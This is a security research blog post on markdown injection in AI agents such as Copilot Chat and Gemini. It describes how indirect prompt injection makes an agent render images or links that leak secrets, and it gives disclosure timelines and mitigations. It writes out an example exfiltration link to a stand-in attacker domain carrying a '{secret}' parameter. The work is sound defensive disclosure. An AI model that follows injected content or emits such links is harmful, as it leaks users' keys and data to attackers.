This document copyright Checkmarx, all rights reserved. Checkmarx Zero has been exploring AI and agent security, with an increased emphasis on this topic following our discovery of the novel Lies-in-the-Loop attack (LITL) which bypasses “Human-in-the-Loop” (HITL) controls mean to prevent AI agents from running harmful code. During this research, we found several cases of markdown injection in AI agents, leading to data exfiltration. Microsoft Copilot Chat and Google Gemini are both vulnerable to this issue, which enables data exfiltration through malicious markdown content that leaks sensitive information via image requests and other rendering behaviors. We suspect most AI agents have similar issues. Markdown injections can also serve as an amplifier for LITL attacks, a behavior we thoroughly discuss in the LITL attack dedicated blog post, which we highly encourage reading if you’re interested in AI agent security. Today, however, we want to explore markdown injection as a standalone vulnerability in Copilot Chat and Google Gemini, demonstrating independent exploitation techniques and attack vectors (similar to those introduced in the Echo Leak vulnerability). Zero-click data exfiltration vulnerability (aka Echo Leak) A zero-click data exfiltration attack is one in which someone steals a data without requiring a legitimate user to take any specific action. The attacker exploits a vulnerability that automatically processes data, so your device leaks data only because it received something from a remote source. A zero-click data exfiltration can occur, for example, when an agent renders certain Markdown elements, such as images. Under the hood, the AI agent’s renderer sends a request to the remote server to fetch the image, then embeds it directly in the conversation. However, attackers can trick the agent into fetching an image (or requesting any content that the agent can be convinced is likely to be an image) from an attacker-controlled server. The attacker can construct the request so that sensitive information is part of the URL, for example, causing the information to leak onto the attacker’s server. Here’s a simple demo that shows how to exfiltrate sensitive information (in this case, it’s Claude’s API key; we used an invalidated key for the demo, for safety reasons) from the developer environment into an attacker-controlled webhook: Your browser cannot display this video content Exploiting Markdown Injection to cause Copilot to exfiltrate a Claude API key We reported this issue to Microsoft, but they did not consider it a vulnerability (their response is available at the bottom of this page). This is in line with how agent vendors have generally viewed unsafe behavior of this type: they generally consider it a risk the user accepts, and the use is responsible for managing that risk. This technique is powerful because it only requires the agent to rely on an attacker-controlled online resource, such as an article. This makes the attack simple to set up. Fortunately for defenders, though, it can be somewhat complex for the attacker to get the agent to consume the malicious resource. Once that happens, though, the indirect prompt injection will tamper with the agent’s output in the chat. This causes the image element to be rendered immediately and leak sensitive information without requiring any further user intervention. Note that in the recorded demo, the image isn’t rendered as a visual element; however, the GET request is still sent to the webhook. This is how injecting image elements via Markdown injection in AI agents can facilitate zero-click data exfiltration. Mitigating this risk typically involves either stripping or blocking image elements in the Markdown renderer. One-click data exfiltration The widely discussed zero-click data exfiltration is not the end of the story. It’s possible to trigger one-click data exfiltration with simple links. Take this markdown link for example: [click here](https://attacker-controlled-domain.com?sensitiveInfo={secret}) Where {secret} is replaced with the actual value of the sensitive information, as shown in the Microsoft Copilot Chat zero-click demo above. Given that Microsoft didn’t commit to fixing the issue of zero-click data exfiltration because it wasn’t considered a vulnerability, we don’t expect the one-click data exfiltration variant will be fixed either.However, Google Gemini prevents zero-click data exfiltration (like EchoLeak) by blocking Markdown image tags using a dedicated sanitizer: Our markdown sanitizer identifies external image URLs and will not render them, making the “EchoLeak” 0-click image rendering exfiltration vulnerability not applicable to Gemini. Reference: Mitigating prompt injection attacks with a layered defense strategy Diving deeper into Google’s philosophy and security strategy for mitigating prompt injection attacks reveals that while they reduce certain risks, this solution remains incomplete. They don’t prevent one-click data exfiltration attacks. We reported the issue to their security team, who responded with “fix is not feasible”. This is an acceptable answer; but it means users should be warned about this risk, since this position puts it in their hands to manage. Google’s strategy involves removing known malicious URLs and other suspicious links from Gemini responses, reducing phishing and malicious link risks in general. They do so thanks to the Google Safe Browsing project; however, these links must be recognized as malicious in advance, before they can be removed , meaning new threats are not automatically flagged. Attackers can set up their own new domain (i.e., one not yet known to the Google Safe Browsing Project) and exploit markdown links to exfiltrate data, rather than the restricted image elements. Combine this with social engineering and redirects, and clicking such links could easily lead to unnoticed data exposure. This attack pathway is not unique to AI agents, of course, but the layer of indirection provided by an attacker getting an AI agent to participate in the attack is a novel advantage for the attacker. Impact Data exfiltration through prompt injections, including markdown injection, in AI agents can lead to severe consequences. Anything that ranges from source code disclosure to leaking secrets can not only result in a complete compromise of the remote machine but also pave the way for an attacker to escalate their privileges horizontally or vertically. Ultimately, data leaks can have serious consequences for organizations regardless of the pathway through which the data escapes. Yet the rapid adoption of AI agents in particular has created blind spots to this type of threat, which security organizations must become aware of and act to control. Mitigations Besides Markdown sanitization, the obvious measure in this context (though perhaps not as obvious, given that Microsoft completely ignores it) is to ensure that when the agent runs on the web, it not only sanitizes Markdown/HTML but also enforces strict CSP (Content Security Policy), particularly for resources like images, CSS styles, and so on that attackers find easiest to exploit. In the context of suggested mitigations, it is worth highlighting how Google handles Markdown and suspicious links. We highly recommend reading Google’s full article “Mitigating prompt injection attacks with a layered defense strategy.” However, remember that even though Gemini identifies & restricts external image URLs as a defensive measure against zero-click data exfiltration, it does not eliminate the one-click data exfiltration risks via external URIs in the links it shares. Wrapping Up Markdown injection in AI agents has been recognized for some time as a risk. Nevertheless, these vulnerabilities still find their way into very popular products, such as Copilot Chat. As always with security, when new technologies emerge, it takes time for the industry to catch up — especially in this rapidly exploding area of AI, where both usage and attack surface are expanding simultaneously. But that’s exactly what should make us, as security professionals, the ones who keep an eye on the door. Disclosure timeline Google First Disclosure 05 Oct 2025 Google closed the issue with status Won't Fix (Infeasible) – 09 Oct 2025 Google’s final response below Hi! We’ve decided that the issue you reported is not severe enough for us to track it as a security bug. When we file a security vulnerability to product teams, we impose monitoring and escalation processes for teams to follow, and the security risk described in this report does not meet the threshold that we require for this type of escalation on behalf of the security team. Regarding VRP, we feel that the submission falls outside of the intended program scope, since we require submissions to demonstrate technical security vulnerabilities with a sufficient severity. For example, Google VRP covers only submissions that “substantially affect the confidentiality or integrity of user data”. To provide feedback on our products, you can use our Google Product Forums, where you can share your feedback with other users and our product team. That said – if you think we misunderstood your report, and you see a well-defined security risk, please let us know what we missed. Thanks again for your report and time, Microsoft Report was submitted – 15 Oct 2025 Microsoft acknowledges the report – 15 Oct 2025 Microsoft notified us that the engineering team is still working on the issue – 28 Oct 2025 Microsoft marks the report as Completed without fixing the issue 04 Nov 2025 MSRC Nov 4, 2025, 7:48 PM Dear Ori, Thank you for your submission and for continuing to engage with MSRC. After careful review, we’ve determined that the behavior demonstrated does not meet our classification for a security vulnerability. It requires multiple non-default user actions, does not reliably reproduce across environments, and includes warnings designed to mitigate risk. Our assessment also considers the role of Workplace Trust, which assumes users operate in environments where they review and trust the code they choose to run. This principle is reflected in Microsoft’s AI Vulnerability Severity Classification, which evaluates both impact and exploitability. That said, we agree this is a thoughtful observation. While not classified as a vulnerability, we’ve shared it with the engineering team to explore ways we can make this behavior more transparent to users. We appreciate your efforts to highlight potential concerns and welcome future submissions that demonstrate broader impact or bypass existing safeguards. Sincerely, Justin Microsoft Security Response Center linkedin-app Share on LinkedIn Share on Bluesky Follow Checkmarx Zero: linkedin-app